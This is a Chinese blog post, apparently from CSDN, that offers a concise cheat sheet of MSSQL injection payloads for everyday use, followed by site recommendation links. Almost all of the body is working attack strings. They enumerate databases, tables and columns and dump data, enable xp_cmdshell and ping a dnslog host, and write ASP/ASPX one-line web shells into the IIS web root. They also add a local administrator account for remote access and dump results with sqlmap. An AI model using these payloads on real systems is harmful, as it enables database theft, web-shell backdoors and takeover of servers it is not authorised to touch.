MSSQL注入流程,简洁

已于 2023-06-29 21:31:07 修改
阅读量730 收藏 3
点赞数
分类专栏: MSSQL注入 文章标签: sqlserver oracle 数据库
于 2021-02-28 16:00:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/114227194
版权

MSSQL注入日常使用的payload,遇到MSSQL注入,这些够用了,完整的在这里
传送门

拿数据的
##判断注入点
and user>0 --
having 1=1--	

##判断权限,如果页面回显正常则为正确,否则报错
and 1=(select IS_SRVROLEMEMBER('sysadmin')) --

##获取当前数据库
And 1=(select db_name()) --

##获取当前数据库内的所有数据表
and 1=convert(int,(select quotename(name) from 数据库..sysobjects where xtype='U' FOR XML PATH(''))) --

##获取当前数据库内的指定数据表的所有字段
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))-- 

##取指定数据库内的表数据内容
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--



命令执行
##开启xp_cmdshell,0为关闭,1为开启
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

##关闭xp_cmdshell
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; --

##执行ping判断否能执行xm_cmdshell和服务器是否通外网,注意:需要开启多语句才能执行xm_cmdshell
;exec master..xp_cmdshell "ping teki6x.dnslog.cn" -- 

##写入一句话木马(asp),需要知道网站根目录
;exec master..xp_cmdshell 'echo ^<%25eval request(1234)%25^> >  C:\Inetpub\wwwroot\test.asp' --

##写入一句话木马(aspx),需要知道网站根目录
;exec master..xp_cmdshell 'echo ^<%25@ Page Language="Jscript"%25^>^<%25eval(Request.Item["aaa"],"unsafe");%25^> >  C:\Inetpub\wwwroot\test.aspx' --

##用XP_CMDSHELL添加用户test1
;exec master.dbo.xp_cmdshell 'net user test1 test1 /add' --

##XP_CMDSHELL把用户test1加到ADMIN组,添加管理员组才可远程
;exec master.dbo.xp_cmdshell 'net localgroup administrators test1 /add' -- 



无回显/网站根目录获取
##在数据库tempdb下创建临时表temp_db,字段test
;use tempdb;create table temp_db (test varchar(1000)); --

##查找网站文件并把结果写入到temp_db表中
;use tempdb;insert into temp_db(test) exec master..xp_cmdshell 'dir /s /b C:\search.asp';--

##用sqlmap得到表temp_db的内容:
python2 sqlmap.py -r 1.txt --dbms="Microsoft SQL Server" --technique=E  -D "tempdb" -T "temp_db" -C "test" --dump --fresh-queries															--fresh-queries参数为刷新缓存

##手工读取temp_db表内容
and 1=(select top 1 * from tempdb..temp_db where test=1 FOR XML PATH(''))--

##建议用like匹配更好,注意吧"%" "''"编码,%编码是%25,单引号是%27
and 1=(select top 1 * from tempdb..temp1_db where test1 like %27%25asp%27  FOR XML PATH('')) --
春日野穹ㅤ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C# mysql 宿舍管理系统
08-06
它的语法简洁明了,支持多种编程范式,如面向对象、面向组件和面向服务,使得开发高效且易于维护的软件成为可能。在宿舍管理系统中,C#可以用于构建用户界面、业务逻辑层和数据访问层,提供友好的交互体验和稳定的...
MSSQL数据库注入(一)
hhhshd的博客
11-17 5353
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2031
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
Web安全基础学习:SQL注入漏洞之Mssql注入
最新发布
qq_51862722的博客
06-18 876
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
SQL注入之Mssql注入
qq_57307348的博客
02-16 5438
sql注入之mssql注入基础
MSSQL注入笔记
春日野穹
02-28 1040
最近在学习MSSQL注入,以前注入的知识全都忘记了,甚至连MSSQL语句都不认识了,非常尴尬,趁着周末有时间,便重新复习了一下,并写个笔记。 写的比较乱,有时间再重新整理一下 2021.2.28 15.48.55 MSSQL基础知识 SQL Server默认库的介绍 初始库有4个 master master 数据库记录了所有的 SQL Server 数据库系统的系统级信息,如用户帐户,配置设置,并在所有其他数据库信息。 model model 数据库是一个模板数据库。每当创建一个新的数据库(包括系统数据
保护您的数据库免受注入攻击:MSSQL注入入门指南
Lion_Long的博客
12-02 1075
MSSQL注入是一种常见的安全漏洞,攻击者通过利用输入验证不足或未正确处理用户输入的情况,向数据库执行恶意注入的SQL代码。本文概述了MSSQL注入的基本知识和常见攻击技术,包括Union注入、基于错误的注入、盲注、时间注入和堆叠查询。为了防止MSSQL注入攻击,建议使用参数化查询、输入验证和过滤、最小权限原则以及定期更新和修补数据库
mysql.rar_mysql api
09-24
封装这样的库的好处在于,它可以使开发过程更加简洁,减少直接使用 MySQL C API 的复杂性,并且由于其接口设计接近 ODBC,对于熟悉 ODBC 的开发者来说更容易上手。同时,通过封装,可以统一错误处理,提高代码的...
PHP + MySQL 学生选课系统
06-19
在信息技术领域,构建一个学生选课系统是教育信息化的重要组成部分,它能够高效地管理课程资源,优化教学流程。本项目以PHP和MySQL为核心技术,构建了一个功能完备、操作简便的学生选课平台。下面我们将详细探讨PHP...
PHP和MySQL Web开发
03-31
PHP的优势在于其语法简洁,学习曲线相对平缓,且与多种数据库系统兼容,尤其是与MySQL配合时,能展现出强大的性能。 MySQL是一款流行的开源关系型数据库管理系统(RDBMS),以其高效、稳定和易用性而受到广大Web...
vue+nodejs+mysql 实现旅行网站
01-27
在构建一个基于“vue+nodejs+mysql...以上就是使用Vue.js、Node.js和MySQL开发旅行网站的基本流程和技术要点。这三者结合,既提供了优秀的用户体验,又保证了数据处理的高效性和安全性,是构建现代旅行网站的理想选择。
mssql注入过程详解
09-11
mssql注入过程详解,从手工注入到具体实现的过程 很适合初学者
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
msSQL注入通杀,只要有注入点就有系统权限
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色    sysadmin             可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5311
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
MSSQL注入的入门讲解
欢迎来到软件测试jeffky博客!在这里,我们将探讨各种与软件测试相关的主题,包括测试策略、方法、工具、最佳实践和行业趋势。我们的目标是帮助读者提高软件质量,确保用户满意度,并分享在软件测试领域的知识和经验。
12-04 106
MSSQL注入是一种网络安全漏洞,其方法是攻击者在Web应用程序的输入框中插入恶意的SQL代码,进而篡改原始的SQL查询语句,以实现攻击者的目标。例如,攻击者可能会试图获取数据库中的敏感信息或执行一些未经授权的操作。
SQL注入漏洞(MSSQL注入
errorr0
07-05 2394
MSSQL注入的入门讲解
SQL Server手工注入方式
good good study
01-04 5676
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
去哪儿网MySQL开发规范与最佳实践
2. **长度限制:** 名称不应超过32个字符,以确保名称简洁且易于理解。 3. **避免保留字:** 禁止使用MySQL的保留字,以免与系统关键字冲突,导致解析错误或意外的行为。 4. **临时对象标识:** 临时库和表必须以`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值